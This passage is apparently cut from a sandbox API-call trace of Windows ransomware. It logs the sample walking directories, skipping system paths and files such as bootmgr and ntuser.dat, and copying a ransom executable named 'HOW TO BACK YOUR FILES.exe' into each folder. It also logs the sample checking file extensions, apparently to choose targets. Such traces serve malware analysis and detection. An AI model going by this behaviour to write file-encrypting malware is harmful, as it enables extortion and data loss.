lpString2=".") returned 1 [0089.173] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.173] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Device", cAlternateFileName="")) returned 1 [0089.173] lstrcmpiW (lpString1="Device", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.173] lstrcmpiW (lpString1="Device", lpString2="aoldtz.exe") returned 1 [0089.173] lstrcmpiW (lpString1="Device", lpString2=".") returned 1 [0089.173] lstrcmpiW (lpString1="Device", lpString2="..") returned 1 [0089.174] lstrcmpiW (lpString1="Device", lpString2="windows") returned -1 [0089.174] lstrcmpiW (lpString1="Device", lpString2="bootmgr") returned 1 [0089.174] lstrcmpiW (lpString1="Device", lpString2="temp") returned -1 [0089.174] lstrcmpiW (lpString1="Device", lpString2="pagefile.sys") returned -1 [0089.174] lstrcmpiW (lpString1="Device", lpString2="boot") returned 1 [0089.174] lstrcmpiW (lpString1="Device", lpString2="ids.txt") returned -1 [0089.174] lstrcmpiW (lpString1="Device", lpString2="ntuser.dat") returned -1 [0089.174] lstrcmpiW (lpString1="Device", lpString2="perflogs") returned -1 [0089.174] lstrcmpiW (lpString1="Device", lpString2="MSBuild") returned -1 [0089.174] lstrlenW (lpString="Device") returned 6 [0089.174] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\*") returned 43 [0089.174] lstrcpyW (in: lpString1=0x2cce454, lpString2="Device" | out: lpString1="Device") returned="Device" [0089.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0089.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2e4710 [0089.174] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0089.174] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c740400, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.174] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.174] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="aoldtz.exe") returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2=".") returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="..") returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="windows") returned -1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="bootmgr") returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="temp") returned -1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="pagefile.sys") returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="boot") returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="ids.txt") returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="ntuser.dat") returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="perflogs") returned 1 [0089.174] lstrcmpiW (lpString1="Task", lpString2="MSBuild") returned 1 [0089.174] lstrlenW (lpString="Task") returned 4 [0089.174] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned 48 [0089.174] lstrcpyW (in: lpString1=0x2cce454, lpString2="Task" | out: lpString1="Task") returned="Task" [0089.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0089.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f1fc8 [0089.174] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0089.175] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 0 [0089.175] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.176] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0089.176] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" [0089.176] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0089.176] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0089.176] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned 46 [0089.176] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" [0089.176] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.176] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.176] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.177] GetLastError () returned 0x0 [0089.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.177] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.177] CloseHandle (hObject=0x120) returned 1 [0089.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.177] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.177] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.177] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.177] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.177] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.177] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.177] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.177] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.177] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.177] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.177] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c740400, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.177] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.177] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c7d8980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7d8980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0089.177] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.177] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="aoldtz.exe") returned -1 [0089.177] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2=".") returned 1 [0089.177] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="..") returned 1 [0089.177] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="windows") returned -1 [0089.177] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="bootmgr") returned -1 [0089.177] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="temp") returned -1 [0089.177] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="pagefile.sys") returned -1 [0089.178] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="boot") returned -1 [0089.178] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="ids.txt") returned -1 [0089.178] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="ntuser.dat") returned -1 [0089.178] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="perflogs") returned -1 [0089.178] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="MSBuild") returned -1 [0089.178] lstrlenW (lpString="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 38 [0089.178] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*") returned 48 [0089.178] lstrcpyW (in: lpString1=0x2cce45e, lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0089.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0089.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xac) returned 0x2c8eb8 [0089.178] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0089.178] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c78c6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c78c6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="aoldtz.exe") returned -1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2=".") returned 1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="..") returned 1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="windows") returned -1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="bootmgr") returned -1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="temp") returned -1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="pagefile.sys") returned -1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="boot") returned -1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="ids.txt") returned -1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="ntuser.dat") returned -1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="perflogs") returned -1 [0089.178] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="MSBuild") returned -1 [0089.178] lstrlenW (lpString="{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 38 [0089.178] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 85 [0089.178] lstrcpyW (in: lpString1=0x2cce45e, lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0089.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0089.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xac) returned 0x2e87c0 [0089.178] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0089.178] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c78c6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c78c6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0089.178] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.178] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0089.179] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0089.179] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0089.179] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0089.179] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 85 [0089.179] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0089.179] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.179] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.180] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.180] GetLastError () returned 0x0 [0089.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.180] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.180] CloseHandle (hObject=0x120) returned 1 [0089.180] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.180] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.180] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c78c6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c78c6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.180] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.180] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.180] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.180] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c78c6c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c78c6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.180] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.180] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.180] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.181] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.181] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c7b2820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7b2820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="aoldtz.exe") returned 1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="temp") returned -1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0089.181] lstrcmpiW (lpString1="en-US", lpString2="MSBuild") returned -1 [0089.181] lstrlenW (lpString="en-US") returned 5 [0089.181] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned 87 [0089.181] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0089.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0089.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x2f2fc8 [0089.181] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0089.181] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78a2eab, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="aoldtz.exe") returned 1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2=".") returned 1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="..") returned 1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="windows") returned -1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="bootmgr") returned 1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="temp") returned -1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="pagefile.sys") returned -1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="boot") returned 1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="ids.txt") returned -1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="ntuser.dat") returned -1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="perflogs") returned -1 [0089.181] lstrcmpiW (lpString1="folder.ico", lpString2="MSBuild") returned -1 [0089.181] lstrlenW (lpString="folder.ico") returned 10 [0089.181] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 91 [0089.182] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="folder.ico" | out: lpString1="folder.ico") returned="folder.ico" [0089.182] lstrlenW (lpString="folder.ico") returned 10 [0089.182] lstrlenW (lpString="Ares865") returned 7 [0089.182] lstrcmpiW (lpString1="der.ico", lpString2="Ares865") returned 1 [0089.182] lstrlenW (lpString=".dll") returned 4 [0089.182] lstrcmpiW (lpString1="folder.ico", lpString2=".dll") returned 1 [0089.182] lstrlenW (lpString=".lnk") returned 4 [0089.182] lstrcmpiW (lpString1="folder.ico", lpString2=".lnk") returned 1 [0089.182] lstrlenW (lpString=".ini") returned 4 [0089.182] lstrcmpiW (lpString1="folder.ico", lpString2=".ini") returned 1 [0089.182] lstrlenW (lpString=".sys") returned 4 [0089.182] lstrcmpiW (lpString1="folder.ico", lpString2=".sys") returned 1 [0089.182] lstrlenW (lpString="folder.ico") returned 10 [0089.182] lstrlenW (lpString="bak") returned 3 [0089.182] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.182] lstrlenW (lpString="ba_") returned 3 [0089.182] lstrcmpiW 